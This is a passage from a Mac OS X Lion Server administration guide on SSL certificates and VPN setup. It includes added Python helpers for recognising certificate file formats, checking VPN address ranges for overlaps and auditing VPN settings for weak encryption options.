6. Drag the files containing the certificate and private key to the middle of the dialog.
7. Click the Import button and if prompted, enter the private key passphrase.
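The import step requires PEM, but a CA may hand you DER-encoded files (.cer or .crt) or a PKCS #12 bundle (.p12) instead. The following Python is an added example, not Apple's code or part of this manual: it tells those encodings apart by peeking at the outer ASN.1 structure, wraps a DER blob in PEM armor, and confirms that a PEM file carries both a certificate and a private key before you drag it into the Server app. The DER blobs it tests are constructed minimal stand-ins, not real certificates or keys, and a passphrase-protected PKCS #12 still needs a tool such as openssl to unpack; this code only recognises it.

```python
"""Recognise PEM, DER and PKCS #12 material before importing it into Lion Server.

Added example (not Apple code). The Server app needs the certificate and key as
PEM text; this distinguishes PEM from the DER encodings a CA may send and wraps
DER in PEM. The sample inputs below are constructed minimal ASN.1 blobs.
"""
import base64
import re

PEM_BLOCK = re.compile(
    rb"-----BEGIN ([A-Z0-9 ]+)-----\s*(.*?)\s*-----END \1-----", re.S)


def _der_tlv(data: bytes, pos: int = 0):
    """Decode one DER tag-length-value at pos; return (tag, value, next_pos).
    Handles the short and long definite length forms (indefinite is not DER)."""
    if pos + 2 > len(data):
        raise ValueError("truncated TLV")
    tag, first = data[pos], data[pos + 1]
    pos += 2
    if first < 0x80:
        length = first
    else:
        nbytes = first & 0x7F
        if nbytes == 0 or pos + nbytes > len(data):
            raise ValueError("bad DER length")
        length = int.from_bytes(data[pos:pos + nbytes], "big")
        pos += nbytes
    if pos + length > len(data):
        raise ValueError("truncated DER value")
    return tag, data[pos:pos + length], pos + length


def pem_blocks(data: bytes):
    """Return [(label, der_bytes)] for every PEM block, validating the base64."""
    blocks = []
    for m in PEM_BLOCK.finditer(data):
        body = b"".join(m.group(2).split())
        blocks.append((m.group(1).decode(), base64.b64decode(body, validate=True)))
    return blocks


def sniff(data: bytes) -> str:
    """Classify a file as 'pem', 'der-certificate', 'pkcs12', 'der-private-key' or 'unknown'.

    The DER cases differ in the first element inside the outer SEQUENCE: a
    Certificate starts with another SEQUENCE (tbsCertificate), a PKCS #12 PFX
    starts with INTEGER version 3, and PKCS #1/PKCS #8 private keys start with
    INTEGER version 0.
    """
    if PEM_BLOCK.search(data):
        return "pem"
    try:
        tag, body, _ = _der_tlv(data)
        if tag != 0x30:
            return "unknown"
        inner_tag, inner_val, _ = _der_tlv(body)
    except ValueError:
        return "unknown"
    if inner_tag == 0x30:
        return "der-certificate"
    if inner_tag == 0x02 and inner_val == b"\x03":
        return "pkcs12"
    if inner_tag == 0x02 and inner_val == b"\x00":
        return "der-private-key"
    return "unknown"


def der_to_pem(der: bytes, label: str) -> str:
    """Wrap DER in PEM armor with 64-column base64 lines."""
    b64 = base64.b64encode(der).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN %s-----\n%s\n-----END %s-----\n" % (label, "\n".join(lines), label)


def import_ready(pem_text: bytes) -> bool:
    """True when the PEM material holds both a certificate and a private key,
    which is what Import a Certificate Identity expects."""
    labels = {label for label, _ in pem_blocks(pem_text)}
    return "CERTIFICATE" in labels and any(l.endswith("PRIVATE KEY") for l in labels)


# Constructed stand-ins (real DER would be far longer):
FAKE_DER_CERT = bytes.fromhex("30023000")   # SEQUENCE { SEQUENCE {} }
FAKE_PKCS12 = bytes.fromhex("3003020103")   # SEQUENCE { INTEGER 3 }
FAKE_DER_KEY = bytes.fromhex("3003020100")  # SEQUENCE { INTEGER 0 }

if __name__ == "__main__":
    for name, blob in [("cert", FAKE_DER_CERT), ("p12", FAKE_PKCS12), ("key", FAKE_DER_KEY)]:
        print(name, "->", sniff(blob))
    bundle = (der_to_pem(FAKE_DER_CERT, "CERTIFICATE")
              + der_to_pem(FAKE_DER_KEY, "RSA PRIVATE KEY")).encode()
    print("import ready:", import_ready(bundle))
```

Run sniff on each file you were sent; anything reported as der-certificate or der-private-key can be wrapped with der_to_pem, while a pkcs12 result means you must first extract the certificate and key with a PKCS #12-aware tool.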

Network infrastructure services

SSL Certificates

Obtain a CA-signed certificate


If your server requires a signed SSL certificate, use a self-signed certificate to request a signed certificate from an external certificate authority (CA). For instructions on creating a self-signed certificate, see Create a self-signed certificate. You obtain a valid signed certificate by using the server's self-signed certificate to generate a certificate signing request (CSR) file, which you send to a known CA. The CSR contains the server's public key and identity, signed with the private key that stays on your server; the private key itself is never sent to the CA. If your request satisfies the authority, it generates and sends you a signed certificate. There is usually a fee involved with this service.

1. Select the server under Hardware in the Server app sidebar.
2. Click Settings and then click the Edit button at the right of SSL Certificate.
3. From the Action pop-up menu, choose Manage Certificates.
4. In the Manage Certificates sheet, select the self-signed certificate you want to use to generate the CSR.
5. From the Action pop-up menu, choose Generate Certificate Signing Request (CSR).
6. Save the CSR file.
Some certificate authorities ask you to enter the CSR text in a field on a webpage instead of uploading a file. In that case, you can copy and paste the text to the CA's website.
7. Upload the CSR file to a CA following the instructions on their website. On the CA's website, look for SSL Certificates.
You can use the CA of your choice. Here are a few CAs:
Thawte, Inc. (www.thawte.com)
VeriSign, Inc. (www.verisign.com)
Comodo Group, Inc. (www.comodo.com)
After receiving your signed certificate from the CA, you can use it to replace your self-signed certificate. For information, see Use an SSL certificate.

Network infrastructure services

SSL Certificates

Use an SSL certificate


Your server can use an SSL certificate to provide additional security for services. The server can use an SSL certificate to identify itself electronically and communicate securely with users' computers and other servers on the local network and the Internet. The SSL certificate provides additional security for Address Book, iCal, iChat, mail, and web services. These services can use the certificate to encrypt and decrypt data they send to and receive from applications on users' computers.

You can use the self-signed certificate created for your server when you set it up, or a self-signed certificate you created, but users' applications won't trust these and will display messages asking if the user trusts your certificate. Using a signed certificate relieves users from the uncertainty and tedium of manually accepting your certificate in these messages. The security difference matters: with a self-signed certificate, a user has no way to tell your server from an impostor presenting its own self-signed certificate for the same host name, so a man-in-the-middle attack is practical against anyone who clicks through the warning. With a CA-signed certificate, client software verifies the chain to a trusted root and rejects an impostor's certificate, so users can trust the services they access without making a judgment call.

1. Select the server under Hardware in the Server app sidebar.
2. Click Settings and then click the Edit button at the right of SSL Certificate.
3. From the Action pop-up menu, choose an available certificate.
If the pop-up menu doesn't contain certificates, create a self-signed certificate. For instructions, see Create a self-signed certificate. To use a previously generated SSL certificate, import it.

RELATED INFORMATION

Obtain a CA-signed certificate
Replace certificates

Network infrastructure services

VPN

About VPN

About VPN
VPN (virtual private network) service lets users connect to your intranet from home or other remote locations over the Internet. Users make a secure VPN connection to access services you haven't made public on the Internet. For example, organizations typically make file sharing available only on their own intranets, requiring their remote users to connect using VPN to access shared files.

VPN service and your server's firewall can both allow access to services from outside your intranet. The difference is that VPN service requires authentication for access, but allowing access through the firewall doesn't require authentication. If VPN service is on, you don't need to expose some services to the Internet through your firewall. For example, you might set the firewall to expose only your web services to the Internet, so the public can view your wikis and custom websites (subject to authentication and access restrictions you impose). Your server's users can access other services (file sharing, Address Book, iCal, iChat, and mail) through a VPN connection.

To ensure confidentiality, authentication, and communications integrity, VPN service uses the L2TP protocol over IPsec with a shared secret. The shared secret is like a passphrase, but it isn't used to authenticate client computer users for a VPN connection; users are authenticated separately, inside the tunnel. Instead, it allows the server to trust client computers that have the shared secret, and it allows client computers to trust the server that has the secret. Both server and client computers must have the shared secret. Because every client holds the same secret, anyone who obtains it (for example, from a lost laptop or a leaked configuration profile) can pose as your VPN server to your users, so protect it and change it whenever it may have leaked.

Users' computers must be configured to make VPN connections. Users' computers with Mac OS X Lion can be configured automatically. For information, see Provide secure remote access with VPN.
If you want to allow access to VPN service on the Internet and you have a cable router, DSL router, or other network router:
Your router must have port forwarding (port mapping) configured for VPN service. For information about port forwarding, see Port mapping for network and server protection.
Your router and VPN users' routers must be configured so that they don't assign conflicting IP addresses. For information, see Provide VPN service through an Internet router.
If you want to allow access to VPN service outside your intranet and your intranet has a separate firewall device, ask the firewall administrator to open the firewall for the ports and protocols that VPN service uses. For a list of ports, see Services and ports.

Network infrastructure services

VPN

About VPN

VPN and security


VPNs stress security by requiring strong authentication of identity and encrypted data transport between the nodes for data privacy and dependability.

The following sections contain information about each s upported transport and authentication method.

Transport protocols
There are two encrypted transport protocols: Layer Two Tunneling Protocol over IP Security (L2TP/IPSec) and Point-to-Point Tunneling Protocol (PPTP). You can enable either or both protocols. Each has its own strengths and requirements.

L2TP/IPSec
L2TP/IPSec uses strong IPSec encryption to tunnel data to and from network nodes. L2TP descends from Cisco's L2F protocol and Microsoft's PPTP. IPSec requires security certificates (self-signed or signed by a certificate authority such as VeriSign) or a predefined shared secret between connecting nodes. The shared secret must be entered on the server and the client. The shared secret is not a user password: it authenticates the two IPSec peers to each other during the IKE exchange, which is how they come to trust each other before agreeing on the keys that protect the tunnel. L2TP is Mac OS X Server's preferred VPN protocol because it has superior transport encryption and can be authenticated using Kerberos.

PPTP
PPTP is a commonly used Windows standard VPN protocol. PPTP supports a number of authentication schemes and derives its MPPE encryption key from the user's password, so its encryption is only as good as that password. By default, PPTP supports 128-bit (strong) encryption. PPTP also supports 40-bit (weak) encryption. PPTP is necessary if you have Windows clients with versions earlier than Windows XP or if you have Mac OS X v10.2.x clients or earlier. Treat PPTP as a legacy option: the MS-CHAPv2 handshake it relies on has since been shown to be breakable with an effort equivalent to a single 56-bit DES key search, regardless of password strength, so enable it only for clients that cannot use L2TP/IPSec and turn it off once they are gone.

Authentication method
Mac OS X Server L2TP VPN uses Kerberos v5 or Microsoft's Challenge Handshake Authentication Protocol version 2 (MS-CHAPv2) for authentication. Mac OS X Server PPTP VPN exclusively uses MS-CHAPv2 for authentication.

Kerberos is a secure authentication protocol that uses a Kerberos Key Distribution Center (KDC) as a trusted third party to authenticate a client to a server.

MS-CHAPv2 is a challenge-response protocol: the password itself never crosses the network, but the server must keep each user's password in a form it can use to verify the response (the NT hash), rather than as a one-way salted hash. It offers reasonable protection during network transmission and is the standard Windows authentication scheme for VPN; see the caveat about PPTP under Transport protocols.

A Mac OS X Server PPTP VPN can also use other authentication methods. Each method has its own strengths and requirements. These other authentication methods for PPTP are not available in Server Admin.

VPN service with a third-party LDAP domain


To use VPN service for users in a third-party LDAP domain (an Active Directory or Linux OpenLDAP domain), you must be able to use Kerberos authentication. If you need to use MS-CHAPv2 to authenticate users, you can't offer VPN service for users in a third-party LDAP domain, because the server cannot verify MS-CHAPv2 responses without access to those users' password hashes.

Network infrastructure services

VPN

About VPN

More information about L2TP/IPsec


The Internet Engineering Task Force (IETF) developed formal standards for L2TP/IPsec user authentication. Request for Comments (RFC) documents provide an overview of a protocol or service and details about how the protocol should behave. If you're a novice server administrator, you'll probably find some of the background information in an RFC helpful. If you're an experienced server administrator, you can find all technical details about a protocol in its RFC document. You can search for RFC documents by number at the website www.ietf.org/rfc.html.

For L2TP description, see RFC 2661. For IPsec, see RFC 4301 and RFC 4309.

For PPTP description, see RFC 2637. For Kerberos version 5, see RFC 1510 (since obsoleted by RFC 4120, which is the current specification).

Network infrastructure services

VPN

Manage VPN

Provide secure remote access with VPN


You can use the Server app to turn on VPN service and customize its settings. VPN (virtual private network) service lets users connect to your intranet from home or other remote locations over the Internet. Users make a secure VPN connection to access services you haven't made public on the Internet. For example, organizations typically make file sharing available only on their own intranets, requiring their remote users to connect using VPN to access shared files.

Start VPN service
1. In the Server app sidebar, select the service you want to start.
2. Click the On/Off switch to turn on the service.
3. If a dialog asks whether you want to allow Internet access to the service you turned on, click Allow to configure your AirPort device and make the service accessible to Internet users. Click Don't Allow if you don't want the service to be accessible to computers on the Internet, or if you're not sure. You can change Internet access to services later by selecting your AirPort device in the Server sidebar. For more information, see Manage AirPort port mapping and Wi-Fi login.
The dialog appears only if your AirPort device is listed in the Server sidebar and you turned on a service that the Server app can manage on your AirPort device. These services include Address Book, iCal, iChat, Mail, and Web. If you have an Internet router that isn't listed in the Server sidebar, you can configure it to allow Internet access to services. This process is called port forwarding or port mapping. For information, see Router port mapping.

Start VPN service from the command line
You can start VPN service from the command line. Open Terminal (located in /Applications/Utilities/), and enter:
$ sudo serveradmin start vpn
For information about serveradmin, see its man page.

Change the VPN shared secret
You can use the Server app to change the shared secret that the server and a client computer use for authentication when making a VPN connection. Periodically changing the shared secret improves VPN security but is inconvenient, because users must also change the shared secret on computers they use for VPN connections.
1. In the Server app sidebar, select VPN and then enter a new secret.
The shared secret should be at least 8 characters (preferably 20 or more) and can include any character you can type. Initially, the shared secret is 20 random characters. The maximum length is 256 UTF-8 characters, and surplus characters are ignored.
You can use Password Assistant to help you compose a new shared secret. Select Users in the sidebar, choose Reset Password from the Action pop-up menu, click the Key button to the right of the New Password field, and then click Cancel and select VPN again in the sidebar. Password Assistant remains open, and you can use it to generate a new shared secret that you copy from the Suggestion field and paste into the Shared Secret field.
2. If you want to verify the secret, select Show shared secret.
After you change the secret on the server, all VPN users must make the same change in their VPN configurations.

Change the IP address range for VPN

Change the IP address range for VPN
You can use the Server app to change the range of addresses you want the server to reserve for assigning to remote computers when they make a VPN connection to the server. For example, you might make the range larger to make more IP addresses available for VPN connections.
1. In the VPN pane of the Server app, change the first or last IP address in the range.
Important: These addresses on the server's network must not be used by other computers or devices on the network. This range of addresses must not include any static IP addresses in use on the network and must not overlap the range of IP addresses that the DHCP server assigns. The range of addresses needs to be large enough for the maximum number of remote computers with concurrent VPN connections. VPN service assigns an IP address to a remote computer for the duration of a VPN connection. When the remote computer disconnects, VPN service reclaims the IP address.
2. If you have an Internet router that provides DHCP service, such as an AirPort Extreme Base Station (802.11n) or Time Capsule, you may need to adjust its IP address range so that the DHCP and VPN address ranges don't overlap. To configure an AirPort Base Station, use AirPort Utility (in the Utilities folder in Launchpad). For information about changing the settings of an Internet router, see its documentation.
The IP address that VPN service assigns to a remote computer for its VPN connection doesn't replace the IP address that the remote computer is already using to connect to the Internet. The remote computer keeps this IP address and any other IP addresses it's using, and adds the IP address assigned to it for VPN.

Create a VPN configuration profile
You can use the Server app to create a configuration profile that sets up Macs and iOS devices for your VPN service. After users open the profile, they can make a VPN connection to your server and intranet via the Internet.
1. In the Server app sidebar, select VPN, and then click Save Configuration Profile.
2. Specify a filename and location for the configuration profile, enter the host name or IP address of your server on the Internet, and then click Save.
The host name is the full, unique name that you registered with your domain name registrar, such as server.example.com. For more information, see Register the server's Internet host name.
After you create a profile, you can have users install it on Macs and on iOS devices such as iPhone, iPad, and iPod touch. Distribute the profile to users by email, or post it to a website. When users open the email attachment or the downloaded profile, they're prompted to start the installation process. You can also distribute profiles over the network directly to iOS devices and Macs by using Profile Manager. For information, see Provide user configuration profiles. Because the profile carries the VPN shared secret so that devices can connect without the user typing it, distribute it only to your own users over channels they trust (not a publicly readable website), and treat a lost or leaked copy as a reason to change the shared secret.

Note: While VPN service is turned on, make sure the server isn't configured to use the Back to My Mac option of MobileMe. The server isn't using this option unless it's signed in to a MobileMe account and Back to My Mac is turned on in the MobileMe pane of System Preferences. VPN service and Back to My Mac conflict because both need to use UDP port 4500.
RELATED TOPICS

About VPN
Provide VPN service through an Internet router
Stop VPN service from the command line
Control a user's access to services

Network infrastructure services

VPN

Manage VPN

Provide VPN service through an Internet router


If you have an Internet router, users who also have Internet routers can't access your VPN service if their intranet addresses begin with the same three numbers as yours. For example, if your server's IP address is 192.168.1.101, users can't access your VPN service from other intranets with addresses that begin 192.168.1. The routes to the two networks collide, so traffic meant for your intranet stays on the user's home network instead of entering the tunnel.

Ask users to change their intranet addresses
You can ask VPN users to change the IP addresses on their home networks to not begin with the same three numbers as the IP addresses on your intranet. For example, if your intranet IP addresses begin 192.168.1, ask VPN users to use IP addresses beginning with 192.168.2 on their home networks. Private networks (RFC 1918) can use addresses beginning with 192.168.0 through 192.168.255, 10.0.0 through 10.255.255, and 172.16.0 through 172.31.255. In all cases, use subnet mask 255.255.255.0.

Change your intranet addresses
To avoid conflicts with VPN users' IP addresses, you can use an uncommon IP address range on your intranet. Change the IP addresses of your server and all other devices on your intranet to not use the most common defaults on Internet routers, which are 10.0.1, 192.168.0, and 192.168.1. You can simply pick a different number between 2 and 254 for the third number of your intranet IP addresses. For example, if your intranet IP addresses begin with 192.168.1, change them to begin with 192.168.58 or 192.168.177. If your intranet IP addresses begin with 10.0.1, change them to begin with 10.0.29 or 10.0.103. You can also use 172.16.0 through 172.31.255. In all cases, use subnet mask 255.255.255.0.
Be sure to change the IP addresses that your Internet router or other DHCP server assigns to computers on your intranet. If you have an AirPort Extreme Base Station (802.11n) or a Time Capsule, use AirPort Utility (located in the Utilities folder in Launchpad). For instructions, see AirPort Utility Help. For information about configuring another kind of Internet router, see its documentation.
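The address rules in this topic and in Change the IP address range for VPN can be checked mechanically before you touch the Server app or the router. The Python below is an added example, not part of this manual, using the standard ipaddress module: it verifies that the VPN pool lies inside the intranet, avoids static hosts and the DHCP range, that the L2TP and PPTP pools (which the L2TP and PPTP settings topics require to be disjoint) don't overlap each other, and that a remote user's home subnet doesn't collide with the intranet. All addresses are constructed for the example. The overlap test is general, so the same function also catches a site-to-site plan whose two LAN subnets overlap.

```python
"""Check a Lion Server VPN address plan for the overlaps this chapter warns about.

Added example, not Apple's documentation or code. Ranges are given as the
first and last address you would type into the Server app; all addresses below
are constructed.
"""
import ipaddress
from typing import Iterable, List, Optional, Sequence, Tuple

IPv4Network = ipaddress.IPv4Network
Range = Tuple[str, str]


def pool_from_range(first: str, last: str) -> List[IPv4Network]:
    """Express a first..last range as the minimal list of CIDR blocks."""
    lo, hi = ipaddress.IPv4Address(first), ipaddress.IPv4Address(last)
    if lo > hi:
        raise ValueError("first address of range is after last address")
    return list(ipaddress.summarize_address_range(lo, hi))


def overlaps(a: Iterable[IPv4Network], b: Iterable[IPv4Network]) -> bool:
    return any(x.overlaps(y) for x in a for y in b)


def check_plan(intranet: str, dhcp_range: Range, static_hosts: Sequence[str],
               l2tp_range: Range, pptp_range: Optional[Range] = None,
               remote_subnets: Sequence[str] = ()) -> List[str]:
    """Return human-readable problems; an empty list means the plan is clean."""
    problems: List[str] = []
    net = ipaddress.ip_network(intranet, strict=False)
    dhcp = pool_from_range(*dhcp_range)
    pools = {"L2TP": pool_from_range(*l2tp_range)}
    if pptp_range:
        pools["PPTP"] = pool_from_range(*pptp_range)

    for name, pool in pools.items():
        # The VPN pool must be drawn from the server's own network ...
        if not all(blk.subnet_of(net) for blk in pool):
            problems.append(f"{name} pool is not inside the intranet {net}")
        # ... but must not be handed out by DHCP or used by fixed hosts.
        if overlaps(pool, dhcp):
            problems.append(f"{name} pool overlaps the DHCP range")
        for host in static_hosts:
            if any(ipaddress.IPv4Address(host) in blk for blk in pool):
                problems.append(f"{name} pool contains static host {host}")
    if "PPTP" in pools and overlaps(pools["L2TP"], pools["PPTP"]):
        problems.append("L2TP and PPTP pools overlap; each protocol needs its own range")

    # A user whose home router uses the same private subnet cannot reach the
    # intranet through the tunnel: the local route wins and traffic never leaves.
    for remote in remote_subnets:
        rnet = ipaddress.ip_network(remote, strict=False)
        if rnet.overlaps(net):
            problems.append(f"remote subnet {rnet} collides with intranet {net}")
    return problems


if __name__ == "__main__":
    # A plan built from router defaults, with every mistake the text describes.
    bad = check_plan(
        intranet="192.168.1.0/24",
        dhcp_range=("192.168.1.100", "192.168.1.200"),
        static_hosts=["192.168.1.1", "192.168.1.160"],     # router and a printer
        l2tp_range=("192.168.1.150", "192.168.1.220"),      # overlaps DHCP and the printer
        pptp_range=("192.168.1.200", "192.168.1.230"),      # overlaps DHCP and L2TP
        remote_subnets=["192.168.1.0/24"],                  # a typical home router
    )
    for p in bad:
        print("PROBLEM:", p)
    # The same plan moved to an uncommon third octet, as the text recommends.
    good = check_plan("192.168.58.0/24", ("192.168.58.100", "192.168.58.149"),
                      ["192.168.58.1", "192.168.58.2"], ("192.168.58.150", "192.168.58.199"),
                      ("192.168.58.200", "192.168.58.249"), ["192.168.1.0/24"])
    print("clean plan:", good == [])
```

Run check_plan with your real intranet, DHCP range, fixed hosts and intended pools; fix every reported problem before enlarging the VPN range or enabling PPTP alongside L2TP.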

RELATED TOPICS

About VPN
Find or change your server's IP address

Network infrastructure services

VPN

Manage VPN

Change L2TP settings


You can enable or disable the L2TP protocol and change its settings from the command line. You must designate an IPSec shared secret (if you don't use a signed security certificate), the IP address allocation range for users, and the group that uses the VPN service (if needed). If L2TP and PPTP are used, each protocol should have a separate, nonoverlapping address range.
When configuring VPN, make sure the firewall allows VPN traffic on needed ports with the following settings:
For the any address group, enable GRE, ESP, VPN L2TP (port 1701), and VPN ISAKMP/IKE (port 500). Clients that connect from behind a NAT router also need IKE NAT Traversal (UDP port 4500), which the site-to-site procedure later in this chapter opens as well.
For the 192.168-net address group, choose to allow all traffic.

1. Open Terminal (located in /Applications/Utilities/), and enter:
$ sudo serveradmin settings
Authenticate if requested. When you run this command, you no longer see the command-line prompt, but you can enter server settings to change them.
2. Enter the following:
vpn:Servers:com.apple.ppp.l2tp:enabled = yes
vpn:Servers:com.apple.ppp.l2tp:IPv4:DestAddressRanges:_array_index:0 = value
vpn:Servers:com.apple.ppp.l2tp:IPv4:DestAddressRanges:_array_index:1 = value
vpn:Servers:com.apple.ppp.l2tp:Server:LoadBalancingEnabled = value
vpn:Servers:com.apple.ppp.l2tp:Server:LoadBalancingAddress = value
vpn:Servers:com.apple.ppp.l2tp:PPP:AuthenticatorProtocol:_array_index:0 = value
vpn:Servers:com.apple.ppp.l2tp:PPP:AuthenticatorPlugins:_array_index:0 = value
vpn:Servers:com.apple.ppp.l2tp:Radius:Server:_array_index:0:Address = value
vpn:Servers:com.apple.ppp.l2tp:Radius:Server:_array_index:0:SharedSecret = value
vpn:Servers:com.apple.ppp.l2tp:Radius:Server:_array_index:1:Address = value
vpn:Servers:com.apple.ppp.l2tp:Radius:Server:_array_index:1:SharedSecret = value
vpn:Servers:com.apple.ppp.l2tp:IPSec:AuthenticationMethod = value
vpn:Servers:com.apple.ppp.l2tp:L2TP:IPSecSharedSecretValue = value
vpn:Servers:com.apple.ppp.l2tp:IPSec:LocalCertificate = value
The settings you entered follow:

Setting (in vpn:Servers:com.apple.ppp.l2tp:)      Default          Set this to
enabled                                            no               yes
IPv4:DestAddressRanges                             _empty_array     value
Server:LoadBalancingEnabled                        0                value
Server:LoadBalancingAddress                        1.2.3.4          value
PPP:AuthenticatorProtocol:_array_index:n           "MSCHAP2"        value
PPP:AuthenticatorPlugins:_array_index:n            "DSAuth"         value
Radius:Server:_array_index:0:Address               1.1.1.1          value
Radius:Server:_array_index:0:SharedSecret          1                value
Radius:Server:_array_index:1:Address               2.2.2.2          value
Radius:Server:_array_index:1:SharedSecret          2                value
IPSec:AuthenticationMethod                         "SharedSecret"   value
L2TP:IPSecSharedSecretValue                        ""               value
IPSec:LocalCertificate                             ""               value

3. When you finish changing settings, hold down the Control key and press D.

Network infrastructure services

VPN

Manage VPN

Change PPTP settings


You can enable or disable the PPTP protocol and change its settings from the command line. You should designate an encryption key length (128-bit recommended for best transport security), the IP address allocation range for your clients, and the group that uses the VPN service (if needed). If you enable PPTP, make sure all VPN clients support 128-bit PPTP connections for greatest transport security, and leave 40-bit (PPP:MPPEKeysize40) disabled: allowing 40-bit transport security is a serious security risk. If you use L2TP and PPTP, each protocol should have a separate, nonoverlapping address range.
When configuring VPN, make sure the firewall allows VPN traffic on needed ports with the following settings:
For the any address group, enable GRE, ESP, VPN PPTP (TCP port 1723), VPN L2TP (port 1701), and IKE (port 500).
For the 192.168-net address group, choose to allow all traffic.

1. Open Terminal (located in /Applications/Utilities/), and enter:
$ sudo serveradmin settings
Authenticate if requested. When you run this command, you no longer see the command-line prompt, but you can enter server settings to change them.
2. Enter the following:
vpn:Servers:com.apple.ppp.pptp:enabled = yes
vpn:Servers:com.apple.ppp.pptp:IPv4:DestAddressRanges:_array_index:0 = value
vpn:Servers:com.apple.ppp.pptp:IPv4:DestAddressRanges:_array_index:1 = value
vpn:Servers:com.apple.ppp.pptp:PPP:AuthenticatorProtocol:_array_index:0 = value
vpn:Servers:com.apple.ppp.pptp:PPP:AuthenticatorPlugins:_array_index:0 = value
vpn:Servers:com.apple.ppp.pptp:Radius:Server:_array_index:0:Address = value
vpn:Servers:com.apple.ppp.pptp:Radius:Server:_array_index:0:SharedSecret = value
vpn:Servers:com.apple.ppp.pptp:Radius:Server:_array_index:1:Address = value
vpn:Servers:com.apple.ppp.pptp:Radius:Server:_array_index:1:SharedSecret = value
vpn:Servers:com.apple.ppp.pptp:PPP:MPPEKeysize40 = value
vpn:Servers:com.apple.ppp.pptp:PPP:MPPEKeysize128 = value
The settings you entered follow:

Setting (in vpn:Servers:com.apple.ppp.pptp:)      Default          Set this to
enabled                                            no               yes
IPv4:DestAddressRanges                             _empty_array     value
PPP:AuthenticatorProtocol:_array_index:n           MSCHAP2          value
PPP:AuthenticatorPlugins:_array_index:n            DSAuth           value
Radius:Server:_array_index:0:Address               1.1.1.1          value
Radius:Server:_array_index:0:SharedSecret          1                value
Radius:Server:_array_index:1:Address               2.2.2.2          value
Radius:Server:_array_index:1:SharedSecret          2                value
PPP:MPPEKeysize40                                  0                value (leave 0)
PPP:MPPEKeysize128                                 0                value (set 1)

3. When you finish changing settings, hold down the Control key and press D.
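The two procedures above describe settings as isolated key = value lines, which makes it easy to leave a weak combination in place (PPTP on with 40-bit MPPE, an eight-character IPSec secret). The Python below is an added example, not Apple's code: it parses text in the format that sudo serveradmin settings vpn prints, flags the combinations this chapter warns against, and emits a corrected stanza you could paste into sudo serveradmin settings. The sample output is constructed for the example; the key names are the ones listed in the L2TP and PPTP procedures, and only those keys are checked.

```python
"""Audit and regenerate Lion Server VPN settings in serveradmin's key = value form.

Added example, not Apple's code. The SAMPLE text is constructed to look like
'serveradmin settings vpn' output on a weakly configured server; the keys are
those listed in the Change L2TP settings and Change PPTP settings procedures.
"""
import secrets
from typing import Dict, List

L2TP = "vpn:Servers:com.apple.ppp.l2tp:"
PPTP = "vpn:Servers:com.apple.ppp.pptp:"


def parse_settings(text: str) -> Dict[str, str]:
    """Turn 'key = value' lines into a dict; quoted string values are unquoted."""
    out: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or " = " not in line:
            continue
        key, value = line.split(" = ", 1)
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        out[key.strip()] = value
    return out


def audit_vpn(settings: Dict[str, str]) -> List[str]:
    """Return findings for the weak combinations the chapter warns about."""
    findings: List[str] = []
    g = settings.get
    if g(PPTP + "enabled") == "yes":
        if g(PPTP + "PPP:MPPEKeysize40") == "1":
            findings.append("PPTP allows 40-bit MPPE; the text calls this a serious risk")
        if g(PPTP + "PPP:MPPEKeysize128") != "1":
            findings.append("PPTP is enabled without 128-bit MPPE")
        findings.append("PPTP is enabled; keep it only for clients that cannot do L2TP/IPSec")
    if g(L2TP + "enabled") == "yes":
        if g(L2TP + "IPSec:AuthenticationMethod", "SharedSecret") == "SharedSecret":
            secret = g(L2TP + "L2TP:IPSecSharedSecretValue", "")
            if len(secret) < 8:
                findings.append("IPSec shared secret is shorter than the 8-character minimum")
            elif len(secret) < 20:
                findings.append("IPSec shared secret is shorter than the recommended 20 characters")
            if len(secret.encode("utf-8")) > 256:
                findings.append("IPSec shared secret exceeds 256 UTF-8 bytes; the surplus is ignored")
        if not any(k.startswith(L2TP + "IPv4:DestAddressRanges") for k in settings):
            findings.append("L2TP is enabled with no client address range")
    for prefix, name in ((L2TP, "L2TP"), (PPTP, "PPTP")):
        for key, value in settings.items():
            if key.startswith(prefix + "PPP:AuthenticatorProtocol") and value != "MSCHAP2":
                findings.append(f"{name} authenticator is {value!r}; review it (MSCHAP2 is the default)")
    return findings


def new_shared_secret(length: int = 32) -> str:
    """Random shared secret well above the recommended 20 characters."""
    return secrets.token_urlsafe(length)[:length]


def hardened_l2tp_settings(first: str, last: str, secret: str) -> List[str]:
    """Lines for 'serveradmin settings': L2TP on with a strong secret, PPTP off."""
    if len(secret) < 20:
        raise ValueError("use at least 20 characters for the shared secret")
    return [
        f'{L2TP}enabled = yes',
        f'{L2TP}IPv4:DestAddressRanges:_array_index:0 = "{first}"',
        f'{L2TP}IPv4:DestAddressRanges:_array_index:1 = "{last}"',
        f'{L2TP}IPSec:AuthenticationMethod = "SharedSecret"',
        f'{L2TP}L2TP:IPSecSharedSecretValue = "{secret}"',
        f'{L2TP}PPP:AuthenticatorProtocol:_array_index:0 = "MSCHAP2"',
        f'{PPTP}enabled = no',
        f'{PPTP}PPP:MPPEKeysize40 = 0',
        f'{PPTP}PPP:MPPEKeysize128 = 1',
    ]


# Constructed sample of a weak configuration (not captured from a real server).
SAMPLE = """
vpn:Servers:com.apple.ppp.l2tp:enabled = yes
vpn:Servers:com.apple.ppp.l2tp:IPv4:DestAddressRanges:_array_index:0 = "192.168.58.150"
vpn:Servers:com.apple.ppp.l2tp:IPv4:DestAddressRanges:_array_index:1 = "192.168.58.199"
vpn:Servers:com.apple.ppp.l2tp:IPSec:AuthenticationMethod = "SharedSecret"
vpn:Servers:com.apple.ppp.l2tp:L2TP:IPSecSharedSecretValue = "secret12"
vpn:Servers:com.apple.ppp.l2tp:PPP:AuthenticatorProtocol:_array_index:0 = "MSCHAP2"
vpn:Servers:com.apple.ppp.pptp:enabled = yes
vpn:Servers:com.apple.ppp.pptp:PPP:MPPEKeysize40 = 1
vpn:Servers:com.apple.ppp.pptp:PPP:MPPEKeysize128 = 1
vpn:Servers:com.apple.ppp.pptp:PPP:AuthenticatorProtocol:_array_index:0 = "MSCHAP2"
"""

if __name__ == "__main__":
    for finding in audit_vpn(parse_settings(SAMPLE)):
        print("FINDING:", finding)
    print("\n".join(hardened_l2tp_settings("192.168.58.150", "192.168.58.199",
                                           new_shared_secret())))
```

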